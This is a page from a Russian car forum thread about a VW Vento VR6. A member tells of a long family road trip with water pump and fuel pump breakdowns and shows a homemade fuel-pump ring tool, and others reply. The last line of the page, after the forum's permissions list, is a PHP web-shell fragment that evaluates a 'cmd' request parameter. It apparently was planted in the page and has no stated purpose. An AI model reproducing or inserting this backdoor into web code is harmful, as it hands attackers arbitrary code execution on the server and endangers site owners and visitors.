+ Ответить в теме
Страница 19 из 19 ПерваяПервая ... 9 17 18 19
Показано с 181 по 186 из 186

Тема: Vento VR6


  1. #181
    GTI-Racing nikoser1227 is on a distinguished road Аватар для nikoser1227
    Регистрация
    14.06.2009
    Откуда
    Московская область, Чехов
    Машина
    VW VENTO GTI VR6
    Сообщений
    124
    Много букв…но почитать будет интересно, как я преодолевал сложности…
    Всем Привет…
    ну вот я и дома…за спиной осталось 3810 км дорог, как уже писал в предыдущем посте, ездил я с семьей на отдых в Дивноморское, это рядом с Геленджиком…а теперь о всех неприятностях, они были и не маленькие!
    неприятность РАЗ!
    -выехали в 19 часов, добравшись до трассы М4 "Дон" решил заправить "ВЕРКУ"…жена забыла все деньги дома…благо хватило бензина вернутся…потеря по времени 2 часа…дальше все было ровно и гладко, дорога отличная, единственное место это участок перед Краснодаром идет ремонт дороги, по полосе в сторону, и если уперется в фуру, так за ней можно и проехать 40 километров до самого Краснодара…дальше все отлично! И так с учетом потерянного времени путь до Дивноморска составил 17 часов!
    неприятность ДВА!
    -утро, скорость 160 км/ч…мои спят, я на раслабоне качусь с горки…и тут мне доброе утро, вы превысили скорость на …короче лишение прав…рассказав про несчастное детство, службу в армии, при этом скорчив морду с глазами…

    …и расставвшись 1 рублем…поехал дальше…
    Не доезжая до Дивноморска…катившись по серпантину…заморгала лампа уровня охлаждающей жидкости…долил жижу…стало все ровно, далее…при отпускания сцепления появился свист…выжимая сцепление…звук пропадал… подумал, что перегрел сцепление, а именно грешил на выжимной подшипник…по приезду на место и постояв пару дней, звук пропал, жижа в норме, съездил в Геленджик на канатку -"Сафари-Парк", ни чего не предвещало беды…я выложил небольшой пост, о том что уже здесь…1504 км позади…

    Обратно, выезжал так же в ночь…, но предстояло ехать не домой, а в Смоленск к Любимой Тещеньке…1706 км…выехал в 15-35 с Дивноморска…дорога была легкая…
    Время 6 часов 15 минут…456 км до дома, и 700 км до Смоленска…пункт взымания денежных средств за проезд по платной дороге, второй пункт после Воронежа, отъезжая от него услышал скрежет который шел из под капота…остановился, открыл капот смотрю в районе расположения ремня вспомогательных агрегатов (помпа, генератор, компрессор кондиционера, натяжной ролик) разбрызганная жидкость…мысли…помпа, подшипник ролика, подшипник гены… демонтировав корпус "ВФ" и натяжитель ремня увидел, что развалился подшипник помпы, люфт был не большой…собрав все обратно, моля бога поехал дальше…на бортовом компьютере выставил отображение температуры ОЖ, и глаза были постоянно на датчике температуры ОЖ…через 50 км, температура начала стремительно расти, послышался хлопок…все приехал…дальше ехать было нельзя…
    …время 6 часов 35 минут…открыв капот, увидел подкапотное пространство в ОЖ, порванный ремень вспомогательных агрегатов, …помпу соответственно заклинило…
    …каждые 3 км, на платной дороге, стоят желтые ящики с надписью "SOS", так вот именно с таким я и остановился, на нем есть кнопка -на нее нажимаешь и тебе должны ответить…я так и сделал…тишина …по дороге курсируют аварийные комиссары, которые должны оказывать помощь, но дозвонится я не смог…но там еще был мобильный телефон эвакуатора…позвонив, мне ответили с пятой попытке…со словами к Вам уже едут, будут через 20 минут…я в шоке, пытаюсь с человеком поговорить…кое как я все же задал вопрос о стоимости эвакуатора…ответ 25000 рублей и до Москвы довезут…
    …поле, дети в черной машине…слава богу спали…еще не было жарко…но уже начинало припекать…
    …позвонил другу, он сел за комп и нашел мне адреса магазинов в близлежащих городах а именно Липецк и Елец, где может быть моя помпа…, но этот вариант приобретения помпы, значил оставить семью на открытом небе под солнцем пока я буду на попутках ее искать, -меня не устраивал…
    …собираясь в дальнюю дорогу, я захватил с собой, запасной ремень вспомогательных агрегатов, натяжной ролик, и помпу…помпу я аккуратно положил в пакетик и оставил на столе в гараже…причем закрывая гараж…я стоял и вспоминал, что забыл…ее Родимую и забыл…
    …следующий звонок, был моему другу, с которым мы варили машину, он для меня как палочка выручалочка…низкий поклон ему… и так звоню, говорю так мол и так…нужна помпа, она на столе, в гараже, ключа у него соответственно нет-говорю срезай и и дуй ко мне…я за 460 км от дома…о поездке в Смоленск, уже не может быть и речи…говорю захвати инструмент, у меня в принципе он был за исключением шестигранников…звони как вскроешь гараж…и положили трубки…
    …в этот самый момент, рядом со мной паркуется ваз-2108 с Краснодарскими номерами…парень Сеня (он ехал в Москву, он был готов дотащить меня до самого дома)… выходит и говорит…мол так мол и так я в теме -низких машин и широких колес…чем могу помочь…итог 200 км, он меня тащил на тросу на встречу моему Другу…


    -пересекали, пункты взымания денег чуть ли не со слезами, девочки просто не знали как пропустить две машины на тросу…


    -тем временем мой Друг мчался ко мне на его бешеном втором Гольфике…

    -мы встретились после последнего пункта на заправке…, отблагодарив Сеню, переодевшись, приступили к замене помпы, за 40 минут…махнули помпу под открытым небом, …и только когда я собрал машину…дочь вместе с Супругой дали волю своим чувствам…они плакали, благодарили БОГА, за то что есть на свете добрые и отзывчивые люди, благодарили Моих Друзей за оказание помощи…
    …через два часа мы были дома…за рулем не сомкнув глаз я провел 24 часа 5 минут!
    …поспав три часа, мы отправились в Смоленск…400 км и мы в гостях у Тещи…


    вчера возвращавшись со Смоленска, не доезжая 7 км, до дома…у меня умер топливный насос……звонок все тому же Другу…Ильдару…и он через 15 минут, был рядом…дотащив меня до дома…
    …итог…3810 км позади!
    От всего сердца хочу поблагодарить парня Сеню с Краснодара, -может кто знает его машину, а может и лично…пожмите руку и передайте слова благодарности от меня и от моей всей семьи
    -Сеня, ты золотой человек, ты человек с большой буквы…я обязан тебе, ты всегда можешь мне позвонить… знай я твой должник и твой Друг, ты можешь на меня рассчитывать!
    -так же я хотел выразить слова благодарности моей второй половинке, Родная спасибо тебе за огромную моральную поддержку которую ты мне оказывала всю дорогу!
    P.S: Ну и хотелось бы закончить пост на более приятную тему, а именно показать вам фотографии моей "ВЕРКИ" в том виде в котором она сейчас есть!












    -как вы можете видеть, на "ВЕРКЕ" одет обвес, все тот же обвес от "RIEGER"- ужасного выноса колес больше нет, его скрыл как обвес так и отрицательный развал на 1 градус передних колес, так и мех.манипуляции с суппортами…проставок нет! Машина занижена при помощи все тех же винтов от ТА-Tecnik, на столько на сколько возможно без последствий для резины и арок!Спасибо всем, кто прочитал и осилил этот текст!
    Ни гвоздя ни жезла!
    VW Vento GT 1,8 ABS-погибла!
    VW Vento VR6 GTI-наслаждаюсь полетом! :epti-work:

  2. #182
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Все осилил. Поездка дичь! Хорошо что естт друзьч и добрые люди
    песок сыпется....не останавливайтесь на достигнутом !

  3. #183
    GTI-Racing inmd will become famous soon enough Аватар для inmd
    Регистрация
    14.02.2013
    Откуда
    Москва, Гольяново
    Машина
    Golf MKVI GTI
    Сообщений
    162
    Машине зачет!
    Истории - зачет! Написано с эмоциями, иллюстрациями, все как надо!
    Вообще сам замечаю, что чем дальше от столицы, тем люди как правило проще и участливее.
    Единственный вопрос - а как с таким обвесом и занижением по нашим южным дорогам? 0_O

  4. #184
    GTI-Racing nikoser1227 is on a distinguished road Аватар для nikoser1227
    Регистрация
    14.06.2009
    Откуда
    Московская область, Чехов
    Машина
    VW VENTO GTI VR6
    Сообщений
    124
    Цитата Сообщение от inmd Посмотреть сообщение
    Машине зачет!
    Истории - зачет! Написано с эмоциями, иллюстрациями, все как надо!
    Вообще сам замечаю, что чем дальше от столицы, тем люди как правило проще и участливее.
    Единственный вопрос - а как с таким обвесом и занижением по нашим южным дорогам? 0_O
    -все нормально с обвесом...правда когда на подземную парковку гостевого дома заезжал, -он там под диким углом+еще и лежак...оторвал задний бампер,....выезжал оторвал передний......но они у меня на быстро-съеме поэтому 5минут и опять в платье!))))

    ---------- Сообщение добавлено в 09:33 ---------- Предыдущее сообщение размещено в 09:32 ----------

    Цитата Сообщение от BON Посмотреть сообщение
    Все осилил. Поездка дичь! Хорошо что естт друзьч и добрые люди
    Да дружище.....не могу с тобой не согласиться!

    P.S: Возвращая со Смоленска, на Минке перед Дорохово...видел красный Гольф 4...на широких ББС РС-не знаешь чей!???...номер не запомнил...но регион 777!?????
    VW Vento GT 1,8 ABS-погибла!
    VW Vento VR6 GTI-наслаждаюсь полетом! :epti-work:

  5. #185
    GTI-Racing nikoser1227 is on a distinguished road Аватар для nikoser1227
    Регистрация
    14.06.2009
    Откуда
    Московская область, Чехов
    Машина
    VW VENTO GTI VR6
    Сообщений
    124
    Всем привет, небольшая запись о насущном!)))
    Наверно ни я один меняя топливный насос, проклинал инженеров VAG-за устройство крепежа топливного насоса, а именно кольцо которое плотно крепит через резинку топливный насос в топливном баке!)))
    Так вот в очередной раз меняя топливный насос я чертыхался и при помощи какой то матери и подручного инструмента я демонтировал это ебу****ие кольцо!-я его конечно демонтировал и насос в итоге поменял, но грани на этом кольце были попорчены изрядно-вряд ли еще раз переживет монтаж/демонтаж…
    Закончив работу я подумал, если немцы так все сделали значит и есть спец/инструмент и полез в интернет…и правда такое приспособление есть!
    Вот оно…





    это маленькая часть из того что есть, но ценник начинается от 1200 рублей! Не хило…
    И так, поняв как оно выглядит, я принял решение что покупать не буду, а сделаю сам при помощи нужных людей и не большого количества вкусной ВОДКИ))))!
    Из вариантов, что есть я выбрал вариант — крестом! Прикупив тут же оригинальную крышку VAG № 321 201 375А — цена 152 рубля!)))




    я столкнулся с тем что грани не все одинаковые, и конкретно под нее крестом не подойдет а вполне подойдет и трех лучевая звезда, что в принципе было и сделано, вместо правда болта была приварена б/у-шная головка под стандартный ключ!
    Вот оно сие творение…




    Творение уже установлено, старое кольцо оставил в багажнике и фоткать не стал!
    Всем Удачи на Дорогах!
    Цена вопроса: 352 рубля
    VW Vento GT 1,8 ABS-погибла!
    VW Vento VR6 GTI-наслаждаюсь полетом! :epti-work:

  6. #186
    Мимо проходил markin is on a distinguished road Аватар для markin
    Регистрация
    28.07.2014
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    28
    Машина - мегазачет!

+ Ответить в теме
Страница 19 из 19 ПерваяПервая ... 9 17 18 19

Похожие темы

  1. Vento VR6 в разбор
    от Darius в разделе Покупка и продажа запчастей
    Ответов: 3
    Последнее сообщение: 08.10.2013, 19:40
  2. Vento AAM Тюнинг
    от Jury84 в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 4
    Последнее сообщение: 21.04.2010, 09:23
  3. Выбор Vento
    от JIp9lHuk в разделе Отзывы / Выбор
    Ответов: 10
    Последнее сообщение: 20.12.2007, 22:12
  4. Vento VR6 Питер
    от Vwvento в разделе Санкт-Петербург
    Ответов: 18
    Последнее сообщение: 19.05.2007, 10:31
  5. vw vento gt 1992 2e
    от VyacheslaW в разделе Покупка и продажа авто
    Ответов: 4
    Последнее сообщение: 24.03.2006, 20:29

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}